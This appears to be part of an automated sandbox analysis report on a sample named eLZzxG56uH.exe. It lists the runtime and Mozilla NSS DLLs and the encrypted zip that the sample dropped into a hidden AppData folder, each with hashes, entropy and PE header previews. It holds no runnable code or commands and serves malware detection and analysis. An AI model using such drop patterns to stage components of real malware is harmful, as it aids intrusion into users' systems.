SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	117712
Entropy (8bit):	6.598338256653691
Encrypted:	false
SSDEEP:	3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
MD5:	A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:	963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:	87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:	89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{7.{7.{..x+>.{..~+I.{...+%.{.x+$.{..+'.{.~+..{..z+4.{7.zA.{..~+>.{..{+6.{...6.{..y+6.{Rich7.{........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.808908775107082
Encrypted:	false
SSDEEP:	6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
MD5:	60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:	989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:	9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:	626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	132048
Entropy (8bit):	6.627391684128337
Encrypted:	false
SSDEEP:	3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
MD5:	5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1:	40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
SSDEEP:	384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\pB4pD1lB4sD3.zip Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
